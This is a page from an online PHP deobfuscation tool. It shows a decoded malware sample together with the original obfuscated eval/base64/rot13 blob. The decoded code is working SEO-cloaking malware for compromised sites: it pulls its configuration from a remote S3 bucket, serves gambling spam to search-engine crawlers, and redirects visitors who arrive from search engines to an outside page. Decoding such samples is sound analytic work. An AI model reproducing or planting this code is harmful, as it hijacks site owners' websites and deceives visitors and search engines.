Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode(str_rot13('5Iqso9gHSU/Cc7vAbgeJTvsg6NFAbdcf7yVc7GbazEu..

Decoded Output download

set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");

define('URI', $_SERVER['REQUEST_URI']);


function fetchRemoteContent($url) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $result = curl_exec($ch);
        curl_close($ch);

        if ($result === false || empty(trim($result))) {
            return false; // 
        }
        return trim($result); // 
    } else {
        $result = file_get_contents($url);
        return $result ? trim($result) : false;
    }
}

$remoteHostUrl = 'https://5useo.s3.sa-east-1.amazonaws.com/js/jiapi.txt';  
$remoteHost = fetchRemoteContent($remoteHostUrl);

$defaultHostEncoded = 'aHR0cHM6Ly9qaS5iZXQ2a3Nlby5jb20v'; 

if ($remoteHost) {
    $decodedHost = base64_decode($remoteHost);
    if (filter_var($decodedHost, FILTER_VALIDATE_URL)) {
        define('host', $decodedHost);
    } else {
        define('host', base64_decode($defaultHostEncoded));
    }
} else {
    define('host', base64_decode($defaultHostEncoded));
}

$remoteMuluUrl = 'https://5useo.s3.sa-east-1.amazonaws.com/js/mulu.txt';
$remoteMulu = fetchRemoteContent($remoteMuluUrl);

if ($remoteMulu && preg_match('/^[\w|.\-\(\)\?\!\:\[\]]+$/', $remoteMulu)) {
    define('MULU', $remoteMulu);
} else {
    define('MULU', 'app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|data|-\d(?!\d)');
}

function isEngines($key){
    return stristr($key, 'Googlebot') !== false || stristr($key, 'Bingbot') !== false || stristr($key, 'Yahoo!') !== false;
}

function isIncludes(){
    $re = 0;
    $temp = explode('|', MULU);
    foreach($temp as $v){
        if(preg_match('/' . $v . '/', URI)){
            $re = 1;
        }
    }
    return $re;
}

function isRef($ref){
    return stristr($ref, 'google') !== false || stristr($ref, 'bing') !== false || stristr($ref, 'yahoo') !== false;
}

function getContents($url){
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $result = curl_exec($ch);
        curl_close($ch);
        if($result == NULL){
            return file_get_contents($url);
        }
        return $result;
    } else {
        return file_get_contents($url);
    }
}

$ref = $_SERVER["HTTP_REFERER"];
$key = $_SERVER["HTTP_USER_AGENT"];
$ym = $_SERVER['HTTP_HOST'];

if (isEngines($key)) {
    header('Content-Type:text/html;charset=utf-8');
    if(isIncludes()){
        echo getContents(host."?xhost=".$ym.'&reurl='.URI.'&ua=Googlebot'.'&f=google');
        exit;
    } else {
        echo file_get_contents("https://jsc.hhvipcdn.com/index.php");
    }
} else {
    if(isIncludes() && isRef($ref)){
        header("Location: https://5useo.s3.sa-east-1.amazonaws.com/tz/br30.html");    
        exit;
    }  
}

Did this file decode correctly?

Original Code

<?php
eval(gzinflate(base64_decode(str_rot13('5Iqso9gHSU/Cc7vAbgeJTvsg6NFAbdcf7yVc7GbazEuYfJ7fz/v2wd/kiJzF1K2Uy/R2kQgZDtVWWPGDRUjnhb1ijoa+xmccj8dRrZSFJ9a3/Yh/p87iaUVvYRTUkCYbxNd1dgHXWNkMnVHxLXTt/vQ+5uYfxSNg3zJ+VY4bg6pO2HXPGRGSSHBiMef45RGHE6Wsse8VPtJU9XyCIXIw7vyedTF1QCBELG5EGBAuk2v1Ysa9FNbJ+vCsScG5dR+R7McxlNEW/nvyHruc6XlN4XS9cTnlScyDYevd2POtHM8XEpix5SBlKIEUf0ZIUTIU8HrVyDIt3aoK0A2B2KkjXPAdDdQF4D2RGnCqZD/n5f5On9pj19Q6GMEnenLSVBmgCw40cSVsr5m8Z8KTt1o7dzVcWUmxvrmXMRWfnJQEgB0kGgXQ2LzRqnMselr2HEDuZtmRIOHuUJoa2umT8tzWTVI+byAQyDc68+mavl+rK3m945hsiaa12sZ/saa5+ghKZ5KmjbYvaCKLjZJmK189+/mCS88isitqIS9/9qiS91++/h5SeUzBvNmh7WdY96yUeNSHf52HQypKHcy6mQF2532wesDFvM/PrnRNE7VHT4lYGhvOP8HIVhOoypezvOBz89f6k2JPhFvi63vVamVsw7yhf2UyzSrBXD6bYvMPdFTHglIwinoD55mW/WFttmPRWw8Mif0p4ftLpZBf2b39B83cO5/v1vo9+XBUT/w2tqroou73Adda4X5DFUBnJpllOvMwB2xLCpmWasrf5BBpsB2l4ntaFTvq4yQAn6+u3o1z2mPgEmiAiKf7oHA2m1k1MC3iteDxtWklni5XZuqHSfX7PbrzmoXIA/HhMv7GiG/lEh+D7vTbWqaBT/eoKXrrMX5m+LeIIyqERWXOApFtePdIG550k5UrYKsIegoq7d50g7cChxqUg0bIPr2y4vjQTDo7aJMaDnE2CIdccVXQVXXZE9u3DxnqlTSw32CLvKbr9x+vUuTEwGa1JGGND8XwjZCG6WD6uRHOBlSuSQVzVc+ZrrEttnAl11T3I7dBcvDjm9vrpfZstTgb1OZl1MWb0voy0WijR59NGCpMT3vxk4Qx0HdrbuoxCbEk9Knck9uyoPHigOwLaz97VjpvF6ZP+PPG1nGnFtXVRI7WWCOxEFxEjPoEF6hkm0XPVJhWUBnbqXdq5quJaphftaDDtS+XGPHZEH2oM9wR93cgtHCCP/BpgatSx/EyEsJK4NbatZDtkaHcKVyDQ0O9v8uHVebpHTQyh3Bx/O/Ap1t5qh4oOmNiv/ifXsH8KAaHd0vSyt2jbQ0CEgnfgPbo+abA3MV9Ql0/Ub/1OW24jrSpy3hBIimKS4zTfKAC7tYI/8KJxJhQl50QUKFnGr36krWgH/18lKksZzWhLwLo/a242TkiYGon7HCNU2N3mBVEfQlDlIHOJKAJKUFkmUFLS1SvRLzypcFF/tVWMvJsegiX3Yd9MAgJMgAnmGAKQx9vh2lhPrIx1VioR/z3KgDuGS1MQDyNHSq04PO4T+U6WriPr7+rxpHy9gPml3PBKI5ShMvA1TAh6657FtCo8rZBb75QWaetOfKeu/eP7rFRmWSp7eYMslcAMzCWYSibkzApCX30jgiIhAZuQTag2efvJFO/ND=='))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 90198884f42198ec5bbc38eadfb59178
Eval Count 1
Decode Time 84 ms